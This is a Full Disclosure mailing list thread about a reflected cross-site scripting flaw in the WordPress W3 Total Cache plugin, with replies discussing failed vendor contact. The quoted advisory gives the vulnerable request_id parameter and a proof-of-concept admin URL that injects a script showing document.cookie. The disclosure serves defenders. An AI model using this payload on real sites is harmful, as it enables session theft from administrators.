Full Disclosure mailing list archives
Re: XSS Wordpress W3 Total Cache <= 0.9.4.1
From: "Fernando A. Lagos Berardi" <fernando () zerial org>
Date: Thu, 22 Sep 2016 18:08:44 -0300
Hi Simon, I have found this vulnerability 1 year ago (july 2015). I've tried to contact them many times but no answers. cheers, Fernando 2016-09-22 5:28 GMT-03:00 Simon Rawet <sr () outpost24 com>:
Hi Fernando, Do you have a timeline for this issue? Additionally do you have any contact details for the w3tc team you could share? All my attempts to contact them have fallen short. On 21/09/16 13:56, Fernando A. Lagos Berardi wrote:[+] Description: Cross-Site Scripting vulnerability was found onWordpressW3 Total Cache (w3tc) plugin. [+] Plugin Version tested: <= 0.9.4.1 (latest) [+] Wordpress version tested: 4.0.0 - 4.6.1 (latest) ------------------------------ [+] Component: W3 Total Cache Admin (performance menu) -> Support -> Add new ticket [+] Variable: request_id [+] Method: GET ------------------------------- [+] Affected URL: https://labs.nivel4.net/wordpress/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&payment&url= http://example.org&name=test&email=test%40gmail.com& twitter&phone&subject=test&description=test&forum_url&wp_ login&wp_password&ftp_host&ftp_login&ftp_password& subscribe_releases&subscribe_customer&w3tc_error=support_ request&request_id=XSS_PAYLOAD_HERE--------------------------------- [+] POC: https://labs.nivel4.net/wordpress/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&payment&url= http://example.org&name=test&email=test%40gmail.com& twitter&phone&subject=test&description=test&forum_url&wp_ login&wp_password&ftp_host&ftp_login&ftp_password& subscribe_releases&subscribe_customer&w3tc_error=support_ request&request_id=11111666"><DEFANGED_script>alert(document.cookie)<%2Fscript> [+] More info: https://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-en-wordpress-w3-total-cache/-- Best Regards, ----------------------------------------------------- Simon Rawet Web Application Analyst, Outpost24 AB Skeppsbrokajen 8 | 371 33 Karlskrona | Sweden T: +46 708 474 323 ---Outpost24 - Vulnerability Management Made Easy!---
-- Fernando A. Lagos Berardi - Zerial Seguridad Informatica Linux User #382319 Blog: http://blog.zerial.org _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- XSS Wordpress W3 Total Cache <= 0.9.4.1 Fernando A. Lagos Berardi (Sep 21)
- Re: XSS Wordpress W3 Total Cache <= 0.9.4.1 Simon Rawet (Sep 27)
- Re: XSS Wordpress W3 Total Cache <= 0.9.4.1 Fernando A. Lagos Berardi (Sep 27)
- Re: XSS Wordpress W3 Total Cache <= 0.9.4.1 Simon Rawet (Sep 27)